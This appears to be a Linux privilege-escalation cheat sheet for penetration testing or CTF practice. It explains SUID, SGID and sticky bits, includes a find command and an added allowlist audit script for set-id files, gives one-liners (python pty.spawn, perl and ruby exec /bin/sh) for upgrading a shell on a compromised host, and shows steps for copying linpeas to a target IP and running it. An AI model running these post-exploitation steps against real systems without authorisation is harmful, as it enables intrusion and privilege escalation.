| Permission | On Files | On Directories |
|---|---|---|
| SUID Bit | User executes the file with permissions of the file owner | - |
| SGID Bit | User executes the file with the permission of the group owner | File created in directory gets the same group owner |
| Sticky Bit | No meaning | Users are prevented from deleting files from other users |
SUID bits can be dangerous. Some binaries, such as passwd, need to run with elevated privileges (because it resets your password on the system), but other custom files that have the SUID bit set can lead to all sorts of issues.
To search a system for these types of files, run the following:
find / -perm -u=s -type f 2>/dev/null
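As an added example (not from the original page), the same search can be turned into a baseline check that reports only setuid and setgid files missing from a reviewed allowlist, together with the owner and group they run as. The function name, the allowlist format (one absolute path per line) and the `/etc/setid.allow` path in the usage comment are assumptions.

```shell
#!/bin/sh
# Added example: audit setuid/setgid files against a reviewed allowlist.
#
# audit_setid ROOT ALLOWLIST
#   ROOT       directory tree to scan (use / on a real host)
#   ALLOWLIST  file with one expected absolute path per line (assumed format)
#
# Prints one tab-separated line per file that is NOT on the allowlist:
#   <SUID|SGID|SUID+SGID> <owner> <group> <path>
# Paths containing newlines are not handled.
#
# Usage (hypothetical allowlist location): audit_setid / /etc/setid.allow
audit_setid() {
    root=$1
    allow=$2
    # -xdev keeps the scan on one filesystem; errors from unreadable
    # directories are discarded, as in the one-line search above.
    find "$root" -xdev -type f \( -perm -u=s -o -perm -g=s \) 2>/dev/null |
    while IFS= read -r path; do
        # Skip files that were already reviewed and accepted.
        grep -Fxq -- "$path" "$allow" && continue

        # Parse the mode string and ownership from ls, which is portable
        # across GNU and BSD userlands (stat's options are not).
        ls -ld -- "$path" | {
            read -r mode links owner group rest
            kind=
            # Character 4 of the mode string is s/S when setuid is set.
            case $mode in ???[sS]*) kind=SUID ;; esac
            # Character 7 is s/S when setgid is set.
            case $mode in ??????[sS]*) kind=${kind:+$kind+}SGID ;; esac
            printf '%s\t%s\t%s\t%s\n' "$kind" "$owner" "$group" "$path"
        }
    done
}
```

Anything this prints is a file that gained or kept a set-id bit without review; the owner column shows whose privileges it executes with.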
Get a TTY Shell
If you get a shell without a TTY, here are some commands you can try to fix this.
Choose an option based on what is installed on the system:
/usr/bin/script -qc /bin/bash /dev/null
python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'
or from within perl: exec "/bin/sh";
ruby: exec "/bin/sh" (or from within the Interactive Ruby Shell)
- Vi from within vi
- nmap interactive mode:
Download linpeas and copy it to the target, e.g. 10.10.112.131
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
scp linpeas.sh firstname.lastname@example.org:/dev/shm
chmod +x linpeas.sh
./linpeas.sh